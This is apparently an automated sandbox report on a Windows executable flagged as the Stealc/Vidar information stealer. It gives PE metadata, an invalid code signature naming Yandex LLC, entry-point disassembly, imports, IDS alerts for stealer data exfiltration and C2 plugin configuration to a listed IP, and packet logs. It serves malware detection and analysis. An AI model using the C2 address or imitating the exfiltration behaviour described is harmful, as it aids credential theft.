                                                                                                                                                                                                                                                                                    SSDEEP:24576:vDw2rbC8+Cg4XrskXwuEeSM/o60vFApfYR/S/x04Pp6alqXE:bY8+aBgRM/2vFafYpS5ZFlK
                                                                                                                                                                                                                                                                                    TLSH:204523ABC5BD2932FBE117F555B9D902283191931E74822ECF81E88C3E10EA5CD25B77
                                                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                                                                                                                                    Icon Hash:3245e1c1e97afcdb
                                                                                                                                                                                                                                                                                    Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                    Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                                                                                    Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                                                                                    • 20/03/2024 10:23:35 21/03/2026 10:23:35
                                                                                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                                                                                    • CN=YANDEX LLC, O=YANDEX LLC, STREET="Lev Tolstoy street, 16", L=Moscow, S=Moscow, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1027700229193, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                                                                                    Thumbprint MD5:9906E73CDAF5570B04FDE09A4BCB74A9
                                                                                                                                                                                                                                                                                    Thumbprint SHA-1:46E2F09D295573BB09DACC6B209B142C244A30D6
                                                                                                                                                                                                                                                                                    Thumbprint SHA-256:6E4B1A3C72EF08F8311CF4F596DE8CCA679D06C51A87E1C5714F8DECB84BCB37
                                                                                                                                                                                                                                                                                    Serial:6F126C9CC287DE458CE890F6
                                                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                                                    sub esp, 000002D4h
                                                                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                                                                                                                    xor ebp, ebp
                                                                                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                                                                                    mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                    mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                    mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                    call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                    push 00008001h
                                                                                                                                                                                                                                                                                    call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                    call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                    push 00000008h
                                                                                                                                                                                                                                                                                    mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                    call 00007F0B64D5314Bh
                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                    push 000002B4h
                                                                                                                                                                                                                                                                                    mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                    lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                    push 0040A264h
                                                                                                                                                                                                                                                                                    call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                    push 0040A24Ch
                                                                                                                                                                                                                                                                                    push 00476AA0h
                                                                                                                                                                                                                                                                                    call 00007F0B64D52E2Dh
                                                                                                                                                                                                                                                                                    call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                    mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                                                                    call 00007F0B64D52E1Bh
                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                    call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                    cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                    mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                    mov eax, edi
                                                                                                                                                                                                                                                                                    jne 00007F0B64D5071Ah
                                                                                                                                                                                                                                                                                    push 00000022h
                                                                                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                                                                                    mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                    call 00007F0B64D52AF1h
                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                    call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                                                                                                                    mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                    jmp 00007F0B64D507A3h
                                                                                                                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                                                                                                                    pop ebx
                                                                                                                                                                                                                                                                                    cmp ax, bx
                                                                                                                                                                                                                                                                                    jne 00007F0B64D5071Ah
                                                                                                                                                                                                                                                                                    add esi, 02h
                                                                                                                                                                                                                                                                                    cmp word ptr [esi], bx
                                                                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                    • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                    • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                    • [LNK] VS2010 SP1 build 40219
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x5342e | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1221d6 | 0x2b38 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x100000 | 0x5342e | 0x53600 | f53548c2f4090dead20a79f7c67f6ac1 | False | 0.9873442185157422 | data | 7.920350796668945 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x154000 | 0xfd6 | 0x1000 | 6949dc1af917df618b49f48d45e67137 | False | 0.56884765625 | data | 5.318309025172059 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x100268 | 0x48567 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States | 0.9924298418805583 |
| RT_ICON | 0x1487d0 | 0x7843 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 0.9991230064637672 |
| RT_ICON | 0x150014 | 0x27b8 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0010818253343823 |
| RT_ICON | 0x1527cc | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7934397163120568 |
| RT_DIALOG | 0x152c34 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x152d34 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x152e50 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x152eb0 | 0x3e | data | English | United States | 0.8387096774193549 |
| RT_VERSION | 0x152ef0 | 0x268 | MS Windows COFF Motorola 68000 object file | English | United States | 0.5016233766233766 |
| RT_MANIFEST | 0x153158 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193 |
| DLL | Import |
|---|---|
| KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW |
| USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW |
| GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject |
| SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation |
| ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW |
| COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
| ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance |
| VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-27T14:46:47.093401+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.5 | 49772 | 116.203.8.178 | 443 | TCP |
| 2024-12-27T14:46:49.516195+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.5 | 49778 | 116.203.8.178 | 443 | TCP |
| 2024-12-27T14:46:51.853531+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 116.203.8.178 | 443 | 192.168.2.5 | 49784 | TCP |
| 2024-12-27T14:46:54.194581+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 116.203.8.178 | 443 | 192.168.2.5 | 49790 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:08.128426075 CET49706443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:39.701082945 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:39.701180935 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:39.701272964 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:39.712657928 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:39.712711096 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.169094086 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.169241905 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.224148035 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.224205017 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.224457026 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.226560116 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.228786945 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.271353960 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.734952927 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.734977961 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.735018969 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.735033035 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.735042095 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.735109091 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.735135078 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.737207890 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.737246037 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:42.047739983 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:42.047777891 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:42.047868967 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:42.048141003 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:42.048154116 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:43.976526976 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:43.976610899 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:43.982250929 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:43.982258081 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:43.982516050 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:43.982604027 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:43.983124971 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.027335882 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.465019941 CET4970580192.168.2.5104.18.38.233
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.465131998 CET4970480192.168.2.5172.64.149.23
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.465148926 CET4970380192.168.2.5104.18.20.226
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.585314989 CET8049705104.18.38.233192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.585386038 CET4970580192.168.2.5104.18.38.233
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.586020947 CET8049704172.64.149.23192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.586040974 CET8049703104.18.20.226192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.586116076 CET4970380192.168.2.5104.18.20.226
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.586229086 CET4970480192.168.2.5172.64.149.23
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.680963993 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.681036949 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.681039095 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.681101084 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.685209990 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.685230017 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.688149929 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.688194990 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.688386917 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.689800024 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.689814091 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:46.186480045 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:46.186552048 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:46.187019110 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:46.187024117 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:46.188653946 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:46.188657999 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.093439102 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.093501091 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.093516111 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.093559980 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.093813896 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.093833923 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.095487118 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.095511913 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.095591068 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.095880032 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.095890045 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:48.592485905 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:48.592583895 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:48.593496084 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:48.593502045 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:48.595083952 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:48.595088005 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.516247034 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.516269922 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.516333103 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:59.657783985 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:59.657790899 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:59.706934929 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.016727924 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.024046898 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.024108887 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.025492907 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.025567055 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.026902914 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.026997089 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.027364016 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.027383089 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.081083059 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.215954065 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.216624022 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.216648102 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.217550039 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.217621088 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.218460083 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.218525887 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.218899965 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.218909025 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.274897099 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.425245047 CET44349817142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.425862074 CET49817443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.425880909 CET44349817142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.426862001 CET44349817142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.426928043 CET49817443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.427292109 CET49817443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.427352905 CET44349817142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.473421097 CET49817443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.473448992 CET44349817142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.495959997 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.496011019 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.496061087 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.496073961 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.497366905 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.497428894 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.497435093 CET44349814142.250.181.68192.168.2.5
